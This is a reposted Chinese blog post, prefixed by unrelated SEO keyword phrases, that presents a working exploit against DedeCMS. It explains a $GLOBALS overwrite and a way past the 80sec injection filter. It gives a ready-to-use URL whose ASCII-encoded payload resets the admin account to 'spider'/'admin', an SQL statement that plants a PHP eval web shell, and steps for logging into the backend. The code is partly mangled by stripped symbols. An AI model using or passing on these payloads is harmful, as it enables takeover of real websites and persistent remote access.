一个域名可以绑定几个网站,现在比较好的营销平台,手机网站开发注意的问题,线下推广活动方案此漏洞无视gpc转义#xff0c;过80sec注入防御。 补充下#xff0c;不用担心后台找不到。这只是一个demo#xff0c;都能修改任意数据库了#xff0c;还怕拿不到SHELL#xff1f; 起因是全局变量$GLOBALS可以被任意修改#xff0c;随便看了下#xff0c;漏洞一堆#x…此漏洞无视gpc转义过80sec注入防御。 补充下不用担心后台找不到。这只是一个demo都能修改任意数据库了还怕拿不到SHELL 起因是全局变量$GLOBALS可以被任意修改随便看了下漏洞一堆我只找了一处。 include/dedesql.class.php 1 2 3 4 5 6 7 8 9 10 11 12 13 if(isset($GLOBALS[arrs1])) { $v1 $v2 ; for($i0;isset($arrs1[$i]);$i) { $v1 . chr($arrs1[$i]); } for($i0;isset($arrs2[$i]);$i) { $v2 . chr($arrs2[$i]); //解码ascii } $GLOBALS[$v1] . $v2; //注意这里不是覆盖是 } 1 2 3 4 5 6 function SetQuery($sql) { $prefix#__; $sql str_replace($prefix,$GLOBALS[cfg_dbprefix],$sql); //看到这里无话可说不明白为什么要这样做。 $this-queryString $sql; } 另外说下绕过80sec防注入的方法。同一文件中有两个执行SQL的函数。ExecuteNoneQuery和ExecuteNoneQuery2而用ExecuteNoneQuery2执行SQL并没有防注入于是随便找个用ExecuteNoneQuery2执行的文件。 plus/download.php 1 2 3 4 5 6 function SetQuery($sql) { $prefix#__; $sql str_replace($prefix,$GLOBALS[cfg_dbprefix],$sql); //看到这里无话可说不明白为什么要这样做。 $this-queryString $sql; } 构造SQL语句 (提交的时候用ascii加密程序会帮我们自动解密的所以无视gpc) 1 admin SET useridspider, pwdf297a57a5a743894a0e4 where id1 # 完整SQL语句: 1 UPDATE dede_admin SET useridspider, pwdf297a57a5a743894a0e4 where id1 #_downloads SET downloads downloads 1 WHERE hash$hash EXP: 1 http://localhost/plus/download.php?open1arrs1[]99arrs1[]102arrs1[]103arrs1[]95arrs1[]100arrs1[]98arrs1[]112arrs1[]114arrs1[]101arrs1[]102arrs1[]105arrs1[]120arrs2[]97arrs2[]100arrs2[]109arrs2[]105arrs2[]110arrs2[]96arrs2[]32arrs2[]83arrs2[]69arrs2[]84arrs2[]32arrs2[]96arrs2[]117arrs2[]115arrs2[]101arrs2[]114arrs2[]105arrs2[]100arrs2[]96arrs2[]61arrs2[]39arrs2[]115arrs2[]112arrs2[]105arrs2[]100arrs2[]101arrs2[]114arrs2[]39arrs2[]44arrs2[]32arrs2[]96arrs2[]112arrs2[]119arrs2[]100arrs2[]96arrs2[]61arrs2[]39arrs2[]102arrs2[]50arrs2[]57arrs2[]55arrs2[]97arrs2[]53arrs2[]55arrs2[]97arrs2[]53arrs2[]97arrs2[]55arrs2[]52arrs2[]51arrs2[]56arrs2[]57arrs2[]52arrs2[]97arrs2[]48arrs2[]101arrs2[]52arrs2[]39arrs2[]32arrs2[]119arrs2[]104arrs2[]101arrs2[]114arrs2[]101arrs2[]32arrs2[]105arrs2[]100arrs2[]61arrs2[]49arrs2[]32arrs2[]35 如果不出问题后台登录用户spider密码admin漏洞真的不止一处各种包含远程代码执行很多列位慢慢研究。 如果找不到后台参见以前修改数据库直接拿SHELL的方法 1 UPDATE dede_mytag SET normbody {dede:php}file_put_contents(spider.php,!--?php eval($_POST[spider]);?--);{/dede:php} WHERE aid 1 LIMIT 1 ; 配图 1.查看dede当前版本 2.执行exp 3.测试登陆后台spider密码admin 转载于:https://www.cnblogs.com/milantgh/p/3615762.html
